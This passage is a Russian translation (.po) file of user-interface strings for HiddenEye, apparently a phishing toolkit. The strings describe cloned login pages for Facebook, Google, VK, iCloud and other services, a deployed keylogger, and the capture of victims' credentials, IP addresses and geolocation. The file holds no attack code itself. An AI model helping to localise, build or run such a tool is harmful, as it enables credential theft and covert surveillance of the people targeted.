" {0}[{1}1{0}]{1} Ngrok\n"
" {0}[{1}2{0}]{1} Serveo"
#: Defs/Actions.py:119
#, python-brace-format
msgid ""
"\n"
"\n"
"\n"
"{1}"
"<=============================================================================>\n"
" || "
"||\n"
" {1}|| ██ ██ ██ ██████ ██████ ███████ ███ ██ {3}███████ ██ ██ "
"███████ {1}||\n"
" {1}|| ██ ██ ██ ██ ██ ██ ██ ██ ████ ██ {3}██ ██ ██ "
"██ {1}||\n"
" {1}|| ███████ ██ ██ ██ ██ ██ ███████ ██ ██ ██ {3}███████ ████ "
"███████ {1}||\n"
" {1}|| ██ ██ ██ ██ ██ ██ ██ ██ ██ ████ {3}██ ██ "
"██ {1}||\n"
" {1}|| ██ ██ ██ ██████ ██████ ███████ ██ ███ {3}███████ ██ "
"███████ {1}||\n"
" || "
"||\n"
" -----------------------------------------------------------------------------\n"
" v{3}0{1}.{3}1{1}.{3}"
"0{1} BY:DARKSEC{2}\n"
" {0}[ NOW WITH LIVE VICTIM ATTACK INFORMATION ]\n"
" {0}A KEYLOGGER WILL BE DEPLOYED FOR YOU, TO CAPTURE EVERY "
"KEYSTROKE ]\n"
"<=============================================================================>\n"
" "
msgstr ""
"\n"
"\n"
"\n"
"{1}"
"<=============================================================================>\n"
" || "
"||\n"
" {1}|| ██ ██ ██ ██████ ██████ ███████ ███ ██ {3}███████ ██ ██ "
"███████ {1}||\n"
" {1}|| ██ ██ ██ ██ ██ ██ ██ ██ ████ ██ {3}██ ██ ██ "
"██ {1}||\n"
" {1}|| ███████ ██ ██ ██ ██ ██ ███████ ██ ██ ██ {3}███████ ████ "
"███████ {1}||\n"
" {1}|| ██ ██ ██ ██ ██ ██ ██ ██ ██ ████ {3}██ ██ "
"██ {1}||\n"
" {1}|| ██ ██ ██ ██████ ██████ ███████ ██ ███ {3}███████ ██ "
"███████ {1}||\n"
" || "
"||\n"
" -----------------------------------------------------------------------------\n"
" v{3}0{1}.{3}1{1}.{3}"
"0{1} От команды DARKSEC{2}\n"
" {0}[ ТЕПЕРЬ СО СБОРОМ ИНФОРМАЦИИ О ЖЕРТВЕ ]\n"
" {0}ДЛЯ ВАС БЫЛ ЗАПУЩЕН ПЕРЕХВАТЧИК ВВОДА , ЧТОБЫ НЕ ПРОПУСТИТЬ "
"НИОДНОЙ СТРОКИ ]\n"
"<=============================================================================>\n"
" "
#: Defs/Actions.py:150
#, python-format, python-brace-format
msgid "{0}[{1}*{0}]{1} HiddenEye is Opening. Please Wait... %d%%"
msgstr "{0}[{1}*{0}]{1} HiddenEye открывается. Пожалуйста подождите... %d%%"
#: Defs/Actions.py:153
#, python-brace-format
msgid ""
"\n"
"{2}[{1}!{2}]{1} Do you agree to use this tool for educational purposes only? "
"({2}y{1}/{0}n{1})\n"
"{2}HiddenEye >>> {1}"
msgstr ""
"\n"
"{2}[{1}!{2}]{1} Согласны ли вы использовать этот инструмент исключительно в "
"образовательных целях? (Выберите: {2}y = Да{1}/{0}n = Нет{1})"
#: Defs/Actions.py:155
#, python-brace-format
msgid ""
"\n"
"\n"
"[ {0}YOU ARE NOT AUTHORIZED TO USE THIS TOOL.YOU CAN ONLY USE IT FOR "
"EDUCATIONAL PURPOSE. GOOD BYE!{1} ]\n"
"\n"
msgstr ""
"\n"
"\n"
"[ {0} ВЫ НЕ АВТОРИЗОВАНЫ ДЛЯ ИСПОЛЬЗОВАНИЯ ЭТОГО ИНСТРУМЕНТА.ЕГО "
"ИСПОЛЬЗОВАНИЕ ДОПУСКАЕТСЯ ТОЛЬКО В ОБРАЗОВАТЕЛЬНЫХ ЦЕЛЯХ. ДОСВИДАНИЯ![{1} ]\n"
"\n"
#: Defs/Actions.py:157
#, python-brace-format
msgid ""
"\n"
"SELECT ANY ATTACK VECTOR FOR YOUR VICTIM:\n"
"\n"
" {0}[{1}1{0}]{1} Facebook\n"
"\n"
" {0}[{1}2{0}]{1} Google\n"
"\n"
" {0}[{1}3{0}]{1} LinkedIn\n"
"\n"
" {0}[{1}4{0}]{1} GitHub\n"
"\n"
" {0}[{1}5{0}]{1} StackOverflow\n"
"\n"
" {0}[{1}6{0}]{1} WordPress\n"
"\n"
" {0}[{1}7{0}]{1} Twitter\n"
"\n"
" {0}[{1}8{0}]{1} Instagram\n"
"\n"
" {0}[{1}9{0}]{1} Snapchat\n"
"\n"
" {0}[{1}10{0}]{1} Yahoo\n"
"\n"
" {0}[{1}11{0}]{1} Twitch\n"
"\n"
" {0}[{1}12{0}]{1} Microsoft\n"
"\n"
" {0}[{1}13{0}]{1} Steam\n"
"\n"
" {0}[{1}14{0}]{1} VK\n"
"\n"
" {0}[{1}15{0}]{1} iCloud\n"
"\n"
"{0}HiddenEye >>> {1}"
msgstr ""
"\n"
"ВЫБЕРИТЕ МЕТОД АТАКИ ДЛЯ ВАШЕЙ ЖЕРТВЫ:\n"
"\n"
" {0}[{1}1{0}]{1} Facebook\n"
"\n"
" {0}[{1}2{0}]{1} Google\n"
"\n"
" {0}[{1}3{0}]{1} LinkedIn\n"
"\n"
" {0}[{1}4{0}]{1} GitHub\n"
"\n"
" {0}[{1}5{0}]{1} StackOverflow\n"
"\n"
" {0}[{1}6{0}]{1} WordPress\n"
"\n"
" {0}[{1}7{0}]{1} Twitter\n"
"\n"
" {0}[{1}8{0}]{1} Instagram\n"
"\n"
" {0}[{1}9{0}]{1} Snapchat\n"
"\n"
" {0}[{1}10{0}]{1} Yahoo\n"
"\n"
" {0}[{1}11{0}]{1} Twitch\n"
"\n"
" {0}[{1}12{0}]{1} Microsoft\n"
"\n"
" {0}[{1}13{0}]{1} Steam\n"
"\n"
" {0}[{1}14{0}]{1} VK\n"
"\n"
" {0}[{1}15{0}]{1} iCloud\n"
"\n"
"{0}HiddenEye >>> {1}"
#: Defs/Actions.py:160
#, python-brace-format
msgid ""
"\n"
"Operation mode:\n"
"\n"
" {0}[{1}1{0}]{1} Standard Page Phishing\n"
"\n"
" {0}[{1}2{0}]{1} Advanced Phishing-Poll Ranking Method(Poll_mode/"
"login_with)\n"
"\n"
" {0}[{1}3{0}]{1} Facebook Phishing- Fake Security issue(security_mode) \n"
"\n"
" {0}[{1}4{0}]{1} Facebook Phising-Messenger Credentials(messenger_mode) \n"
"\n"
"{0}HiddenEye >>> {1}"
msgstr ""
"\n"
"Тип операции:\n"
"\n"
" {0}[{1}1{0}]{1} Обычная страница\n"
"\n"
" {0}[{1}2{0}]{1} Продвинутый фишинг-Метод опроса(Poll_mode/login_with)\n"
"\n"
" {0}[{1}3{0}]{1} Facebook фишинг- Фальшивая проблема "
"безопасности(security_mode) \n"
"\n"
" {0}[{1}4{0}]{1} Facebook фишинг-Инициалы Messenger'a (messenger_mode) \n"
"\n"
"{0}HiddenEye >>> {1}"
#: Defs/Actions.py:164
#, python-brace-format
msgid ""
"\n"
"Operation mode:\n"
"\n"
" {0}[{1}1{0}]{1} Standard Page Phishing\n"
"\n"
" {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n"
"\n"
" {0}[{1}3{0}]{1} New Google Web\n"
"\n"
"{0}HiddenEye >>> {1}"
msgstr ""
"\n"
"Тип операции:\n"
"\n"
" {0}[{1}1{0}]{1} Обычная страница\n"
"\n"
" {0}[{1}2{0}]{1} Продвинутый фишинг(poll_mode/login_with)\n"
"\n"
" {0}[{1}3{0}]{1} Новый Google Web\n"
"\n"
"{0}HiddenEye >>> {1}"
#: Defs/Actions.py:188
#, python-brace-format
msgid ""
"\n"
"Operation mode:\n"
"\n"
" {0}[{1}1{0}]{1} Standard Instagram Web Page Phishing\n"
"\n"
" {0}[{1}2{0}]{1} Instagram Autoliker Phising (After submit redirects to "
"original autoliker)\n"
"\n"
"{0}HiddenEye >>> {1}"
msgstr ""
"\n"
"Тип операции:\n"
"\n"
" {0}[{1}1{0}]{1} Обычная веб-страница Instagram\n"
"\n"
" {0}[{1}2{0}]{1} Instagram автолайкер (После подтверждения, ссылается на "
"оригинальный автолайкер)\n"
"\n"
"{0}HiddenEye >>> {1}"
#: Defs/Actions.py:212
#, python-brace-format
msgid ""
"\n"
"Operation mode:\n"
"\n"
" {0}[{1}1{0}]{1} Standard VK Web Page Phishing\n"
"\n"
" {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n"
"\n"
"{0}HiddenEye >>> {1}"
msgstr ""
"\n"
"Operation mode:\n"
"\n"
" {0}[{1}1{0}]{1} Обычная веб-страница VK\n"
"\n"
" {0}[{1}2{0}]{1} Продвинутый фишинг(poll_mode/login_with)\n"
"\n"
"{0}HiddenEye >>> {1}"
#: Defs/Actions.py:222
#, python-brace-format
msgid ""
" {0}\n"
" [{1}*{0}] module loaded. Building site...{0}"
msgstr ""
" {0}\n"
" [{1}*{0}] модуль загружен. Построение сайта...{0}"
#: Defs/Actions.py:226
msgid ""
"\n"
" (Choose Wisely As Your Victim Will Redirect to This Link)"
msgstr ""
"\n"
" (Выбирайте с умом, ваша жертва будет перенаправлена по этому адресу)"
#: Defs/Actions.py:227
msgid ""
"\n"
" (Leave Blank To Loop The Phishing Page)"
msgstr ""
"\n"
" (Оставьте пустым чтобы зациклить страницу)"
#: Defs/Actions.py:228
#, python-brace-format
msgid ""
"\n"
" {0}Insert a custom redirect url:"
msgstr ""
"\n"
" {0}Введите альтернативный адрес переадресации:"
#: Defs/Actions.py:229
#, python-brace-format
msgid ""
"\n"
" {0}CUSTOM URL>>> {1}"
msgstr ""
"\n"
" {0}АЛЬТЕРНАТИВНЫЙ АДРЕС >>> {1}"
#: Defs/Actions.py:260
#, python-brace-format
msgid ""
"\n"
" {1}_....~~~~=====~~~~...._\n"
" .'========={3}/----=\\{1}=========>\n"
" /:========={3}/-----====\\{1}\n"
" |=========={3}|-----======|{1}==========>\n"
" \\:========={3}\\---======/{1}\n"
" \\=========={3}\\=====/{1}==========>\n"
" ````~~~~=======~~~~````\n"
"\n"
" {3}HIDDEN EYE {3}BY: DARKSEC TEAM\n"
" {0}THANKS FOR USING IT. HELP US TO MAKE IT MORE USEFUL\n"
" {3}https://github.com/DarkSecDevelopers/HiddenEye "
msgstr ""
"\n"
" {1}_....~~~~=====~~~~...._\n"
" .'========={3}/----=\\{1}=========>\n"
" /:========={3}/-----====\\{1}\n"
" |=========={3}|-----======|{1}==========>\n"
" \\:========={3}\\---======/{1}\n"
" \\=========={3}\\=====/{1}==========>\n"
" ````~~~~=======~~~~````\n"
"\n"
" {3}HIDDEN EYE {3}ОТ КОМАНДЫ DARKSEC \n"
" {0}СПАСИБО ЧТО ОСТАЕТЕСЬ С НАМИ. ПОМОГИТЕ НАМ СДЕЛАТЬ ПРИЛОЖЕНИЕ "
"ПОЛЕЗНЕЕ\n"
" {3}https://github.com/DarkSecDevelopers/HiddenEye "
#: Defs/Actions.py:277
#, python-brace-format
msgid ""
"{0}[{1}*{0}]{1} Waiting for credentials//Keystrokes//Victim's device info. \n"
msgstr ""
"{0}[{1}*{0}]{1} Ожидание базовой информации//нажатий клавиш//информации об "
"устройстве жертвы. \n"
#: Defs/Actions.py:283
#, python-format, python-brace-format
msgid ""
" {0}[ CREDENTIALS FOUND ]{1}:\n"
" {0}%s{1}"
msgstr ""
" {0}[ ИНФОРМАЦИЯ ОБНАРУЖЕНА ]{1}:\n"
" {0}%s{1}"
#: Defs/Actions.py:293
msgid "Victim Public IP: (.*?)\n"
msgstr "Публичный IP жертвы: (.*?)\n"
#: Defs/Actions.py:298
#, python-format, python-brace-format
msgid ""
" \n"
"{0}[ VICTIM IP BONUS ]{1}:\n"
" {0}%s{1}"
msgstr ""
" \n"
"{0}[ Дополнительный IP жертвы ]{1}:\n"
" {0}%s{1}"
#: Defs/Actions.py:304
#, python-format, python-brace-format
msgid ""
" \n"
"{0}[ VICTIM INFO FOUND ]{1}:\n"
" {0}%s{1}"
msgstr ""
" \n"
"{0}[ КООРДИНАТЫ ЖЕРТВЫ ОБНАРУЖЕНЫ ]{1}:\n"
" {0}%s{1}"
#: Defs/Actions.py:305
#, python-brace-format
msgid ""
" \n"
"{0}Longitude: {2} \n"
"Latitude: {3}{1}"
msgstr ""
" \n"
"{0}Долгота: {2} \n"
"Широта: {3}{1}"
#: Defs/Actions.py:306
#, python-brace-format
msgid ""
" \n"
"{0}ISP: {2} \n"
"Country: {3}{1}"
msgstr ""
" \n"
"{0}Интернет провайдер: {2} \n"
"Страна: {3}{1}"
#: Defs/Actions.py:307
#, python-brace-format
msgid ""
" \n"
"{0}Region: {2} \n"
"City: {3}{1}"
msgstr ""
" \n"
"{0}Регион: {2} \n"
"Город: {3}{1}"
#: Defs/Actions.py:317
#, python-format, python-brace-format
msgid ""
" {0}[ GETTING PRESSED KEYS ]{1}:\n"
" {0}%s{1}"
msgstr ""
" {0}[ ПОЛУЧЕНИЕ НАЖАТЫХ КЛАВИШ ]{1}:\n"
" {0}%s{1}"
#: Defs/Checks.py:15
#, python-brace-format
msgid "{0}Successful connection!{1}"
msgstr "{0}Успешное соединение!{1}"
#: Defs/Checks.py:21
#, python-brace-format
msgid ""
"{1}\n"
" _ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1}\n"
" |__| | ] | ] | |__ |\\ | {0}|__ \\__/ |__{1}\n"
" | | | ]__| ]__| |__ | \\| {0}|__ || |__{1}\n"
"\n"
" {0}[{1}!{0}]{1} Network error. Verify your connection.\n"
"\n"
msgstr ""
"{1}\n"
" _ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1}\n"
" |__| | ] | ] | |__ |\\ | {0}|__ \\__/ |__{1}\n"
" | | | ]__| ]__| |__ | \\| {0}|__ || |__{1}\n"
"\n"
" {0}[{1}!{0}]{1} Сетевая ошибка. Проверьте ваше "
"подключение.\n"
"\n"
#: Defs/Checks.py:32
msgid "[*] Downloading Ngrok..."
msgstr "[*] Загрузка Ngrok..."